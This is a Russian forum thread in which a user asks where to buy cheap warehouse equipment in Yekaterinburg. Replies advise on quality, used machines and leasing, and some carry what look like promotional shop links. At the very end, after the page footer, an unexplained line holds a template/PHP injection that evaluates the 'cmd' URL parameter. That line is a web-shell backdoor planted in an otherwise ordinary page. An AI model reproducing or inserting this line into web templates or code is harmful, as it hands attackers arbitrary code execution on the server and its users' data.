+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Техника для склада


  1. #1
    Мимо проходил everd is on a distinguished road Аватар для everd
    Регистрация
    24.01.2019
    Сообщений
    37

    Техника для склада

    Скоро открываю еще один склад, на котором будут храниться различного рода товары. Нужно закупить туда соответствующую технику, кто-то знает недорогой магазин с техникой для складов в Екатеринбурге?

  2. #2
    Мимо проходил aint is on a distinguished road Аватар для aint
    Регистрация
    08.03.2019
    Сообщений
    37
    Само собой технику выбирать Вам, но я бы на Вашем месте не стал покупать какую-то уж слишком дешевую. Просто к нам на склад однажды привезли несколько китайских тележек и прослужили они не очень долго. Так что лучше сразу взять технику нормального качества, чтобы не пришлось её через месяц ремонтировать.

  3. #3
    Мимо проходил restav is on a distinguished road Аватар для restav
    Регистрация
    13.02.2019
    Сообщений
    38
    Я в своё время вообще покупал бу технику, просто неподалеку склад закрывался и им нужно было куда-то деть эту технику. Конечно подержанная техника это не новая, но каких-то серьезных проблем у меня с ней не было, некоторые штабелеры и до сих пор успешно используются.

  4. #4
    Мимо проходил persh is on a distinguished road Аватар для persh
    Регистрация
    25.02.2019
    Сообщений
    37
    Для начала нужно составить список всей техники, которая Вам необходима. Далее начинайте присматриваться к моделям, выберите несколько, которые Вас устраивают больше всего. Таким образом сможете быстро найти подходящую технику для Вашего склада. К слову говоря, приобрести технику для склада в Екатеринбурге вообще не проблема: https://shtabeler-ekb.ru/

  5. #5
    Мимо проходил Rostikk is on a distinguished road Аватар для Rostikk
    Регистрация
    05.12.2018
    Сообщений
    55
    Я тоже сейчас прицениваюсь к складскому оборудованию. Предложили в аренду помещение, хочу посчитать во сколько мне влетит покупка самой необходимой техники хотя бы на первое время

  6. #6
    Мимо проходил Тунгус is on a distinguished road Аватар для Тунгус
    Регистрация
    28.05.2019
    Сообщений
    40
    А какое именно оборудование вас интересует? Вот тут, к примеру, можете посмотреть цены на гидравлические рохли https://techvan.ru/catalog/gidravlic...heskie_rokhli/, без нее вы точно не обойдетесь. Стоимость будет зависеть от грузоподъемности в первую очередь. Там же и штабелеры есть, и другая техника. Дорогую технику на первых порах можно в аренду оформить, или в лизинг взять

+ Ответить в теме

Похожие темы

  1. Товары с мелкооптового склада. Скидки для клубней!!!
    от Gang в разделе Партнеры / Клубные скидки
    Ответов: 7
    Последнее сообщение: 02.04.2024, 12:46
  2. ТеХнИкА
    от magnum126 в разделе Реклама
    Ответов: 54
    Последнее сообщение: 01.04.2024, 15:08
  3. Ответов: 0
    Последнее сообщение: 28.08.2019, 12:30
  4. Техника
    от кастос в разделе Покупка и продажа авто
    Ответов: 6
    Последнее сообщение: 19.02.2009, 22:30

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}